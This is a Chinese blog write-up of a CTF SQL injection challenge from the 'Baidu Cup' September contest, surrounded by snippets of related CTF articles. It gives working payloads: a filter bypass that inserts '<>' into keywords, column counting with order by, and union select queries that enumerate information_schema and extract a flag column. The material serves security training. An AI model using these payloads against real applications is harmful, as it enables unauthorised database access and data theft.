“百度杯”CTF比赛 九月场 SQL

最新推荐文章于 2024-08-22 13:51:27 发布
最新推荐文章于 2024-08-22 13:51:27 发布
阅读量612 收藏 1
点赞数 3
分类专栏: ctf练习 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/drip_big/article/details/105509068
版权

“百度杯”CTF比赛 九月场 SQL 常规流程的注入

题目内容:

出题人就告诉你这是个注入,有种别走!

1 注入点直接给出id=?

用 or 1=1 和 and 1=2测试
结果服务器很耿直的说inj code!
看起来是对输入的参数进行了检测,想办法绕过就行了
得出结果是在敏感语句中加<>就可以,不过像and和or可以直接换成&&与||

2 order by测试字段长度

order by也是敏感字字符,绕过后发现字段数为3

?id=1 ord<>er by 3
//3一下都可以正常输出
//4就得不到结果
?id=1 union sel<>ect 1,2,3 //检测可以输出的位点,本题为1和2

3 正式开始注入

联合查询

?id=1 union sel<>ect 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() 
//直接找出当前使用的数据库的所有表
//结果为info,users
?id=1 union sel<>ect 1,group_concat(column_name),3 from information_schema.columns where table_name='info'
//字段名字
//id,title,flAg_T5ZNdrm
?id=1 union sel<>ect 1,flAg_T5ZNdrm,3 from info
//输出flag
「已注销」
关注
专栏目录
百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 426
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度CTF比赛 九月 YeserCMS 详细解析
drip_big的博客
04-14 840
百度CTF比赛 九月 YeserCMS 详细解析 看题解的,对每个关键步骤做出详细注释 题目内容: 新的CMS系统,帮忙测测是否有漏洞。 1 第一步就是了解这是什么cms 百度YeserCMS,没有相关CMS,应该是改了名字。 在网站内找一找,没看到哪里有标志信息,一下几种方式可以辨认 直接用浏览器搜索cms指纹识别 搜索 “手机版 - 购物车 - 留言 - 繁体 - ...
ctf竞赛ctf
08-07
ctf 实验步骤 
CTF比赛是什么?需要学哪些东西,1篇文章给你讲透彻!
最新发布
weixin_57514792的博客
08-22 1128
CTF比赛是什么?需要学哪些东西,1篇文章给你讲透彻!
百度CTF比赛 九月_SQL
a173262565的博客
04-19 187
题目在i春秋ctf大本营 题目一开始就提醒我们是注入,查看源码还给出了查询语句 输入测试语句发现服务器端做了过滤,一些语句被过滤了 试了一下/**/、+都不行,后来才发现可以用<>绕过 接着就是常规注入语句,先order by判断一下,发现到4就没有回显了,接着上union select 接着直接一套combo带 数据库: 表: 字段:...
百度CTF比赛 九月 SQLi
feng的博客
09-11 306
这题主要涉及SQL注入的相关知识,涉及的绕过是过滤了逗号后面的语句
# “百度CTF比赛 九月SQLi
sinat_40845893的博客
01-02 256
百度CTF比赛 九月SQLi 数据库注入,无逗号union查询构造 求解流程: 进入题目,页面空白,查看源代码 <html> <head><title>Loading...</title></head> <body> <!-- login.php?id=1 --> </body> </html> 根据提示发送GET请求login.php?id=1 welcome admin~&
百度CTF比赛 九月 XSS平台
苟有恒,必有三更眠,五更起。
11-01 1686
百度CTF比赛 九月 XSS平台 登录页面,开始时尝试注入,没有明显效果,无法判断是否存在注入。 一时没了思路,看了大佬的 WP,发现大佬们是通过构造错误参数使得web报错,从而收集信息,算是又学习到了一招。 于是,在burpsuite里面构造错误参数,报错得到信息 image 报错信息中有一个rtiny 在github上找到相应 ...
百度CTF比赛 九月 Web-Login
qq_34106499的博客
01-17 661
1. 审查源码需要仔细认真; 2. 抓包查看请求头和响应头,关注陌生属性; 3. php中反序列化的应用; 4.base64编码的使用 5. gzcompress()压缩及gzuncompress()解压的应用。
百度CTF比赛 九月-web123题
weixin_46784800的博客
12-29 512
百度CTF比赛 九月-web123题 知识储备 敏感信息泄露 敏感信息泄露,是指存在一些备份文件未经处理,而保存在网站目录上,可以进行访问,获得一些信息。 网站备份文件泄露常见后缀: .bak .html _index.html .swp .rar .txt .zip .7z .sql .tar.gz .tgz .tar 网站备份文件泄露扫描工具: Test404网站备份文件扫描器 v2.0(win) ihoneyBakFileScan(python) ​ ihoneyBakFile
百度CTF比赛 九月,Web:SQL
Pai_Space
07-04 189
百度CTF比赛 九月,Web:SQL
CTF赛事介绍详情
m0_73477083的博客
10-13 966
ctf 网络安全比赛 CTF(CaptureTheFlag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCONCTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF中的“世界”.外文名 CTF(Ca
CTF —— 网络安全大赛
Karka_的博客
06-17 2748
前言随着大数据、人工智能的发展,人们步入了新的时代,逐渐上科技的巅峰。⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说,凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。‍ ‍ ‍ 网络安全需要一群网络安全技术人员的维护。而CTF,就是这些人技术竞技的比赛
CTF —网络安全大赛
weixin_68789096的博客
02-27 6182
💻随着大数据、人工智能的发展,人们步入了新的时代,逐渐上科技的巅峰。⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。💂互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说,凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。👨‍👨‍👧‍👦网络安全需要一群网络安全技术人员的维护。而CTF,就是这些人技术竞技的比赛
CTF比赛规划
Greedy Hat的博客
06-07 1327
(1)6月7号-6月31号 PHP学习(重心),Linux学习 (2)7月实验吧练习题目,所有题型都练习一题到两题,之后确定方向 (3)7月到九月继续练题,学习。
CTF比赛中的SQL盲注技巧与实战策略
"本文主要介绍了CTF竞赛中常见的SQL盲注技巧和一些实用的建议,包括XOR注入方法,以及如何应对WAF和过滤规则的...掌握这些盲注技巧和应对策略,将有助于在CTF比赛中解决复杂的SQL注入问题,提升安全防护和攻击能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值